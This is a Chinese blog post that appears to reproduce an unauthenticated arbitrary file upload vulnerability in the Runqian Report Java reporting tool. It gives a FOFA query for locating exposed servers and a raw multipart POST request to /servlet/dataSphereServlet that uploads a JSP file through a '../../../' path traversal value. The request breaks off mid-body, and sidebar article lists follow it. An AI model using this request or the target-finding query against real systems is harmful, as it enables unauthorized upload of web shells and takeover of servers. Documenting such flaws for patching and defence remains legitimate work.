【漏洞复现】润乾报表 servlet/dataSphereServlet 任意文件上传漏洞

0x01 产品简介

润乾报表是一个纯JAVA的企业级报表工具,润乾报表作为领先的企业级报表分析软件,提供了高效的报表设计方案、强大的报表展现能力、灵活的部署机制,以及支持强关联语义模型。这些功能使得润乾报表能够为企业级数据分析与商业智能提供高性能、高效率的报表系统解决方案。

0x02 漏洞概述

润乾报表存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传任意恶意文件,从而控制服务器。

0x03 测绘语句

fofa: body="润乾报表"

0x04 漏洞复现

POST /servlet/dataSphereServlet?action=38 HTTP/1.1

Host:

Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9



--eac629ee4641cb0fe10596fba5e0c5d9

Content-Disposition: form-data; name="openGrpxFile"; filename="456.jsp"

Content-Type: text/plain



321

--eac629ee4641cb0fe10596fba5e0c5d9

Content-Disposition: form-data; name="path"



../../../

--eac629ee4641cb0fe10596fba5e0c5d9

Content-Disposition: form

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-25 17:20:02       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-25 17:20:02       100 阅读
  3. 在Django里面运行非项目文件

    2024-04-25 17:20:02       82 阅读
  4. Python语言-面向对象

    2024-04-25 17:20:02       91 阅读

热门阅读

  1. 【信息系统项目管理师】复习~第二章

    2024-04-25 17:20:02       36 阅读
  2. 国库集中支付系统和国库信息处理系统TIPS介绍

    2024-04-25 17:20:02       31 阅读
  3. GG_zzz的系列博客

    2024-04-25 17:20:02       33 阅读
  4. linux 内核网络源码--流量管理“每日读书”

    2024-04-25 17:20:02       31 阅读
  5. 小白学机器学习之鸢尾花分类(Day03)

    2024-04-25 17:20:02       28 阅读
  6. # 设计模式 #5.6 Memento备忘录,行为型模式

    2024-04-25 17:20:02       32 阅读
  7. Zookeeper和Redis分别实现分布式锁的原理

    2024-04-25 17:20:02       35 阅读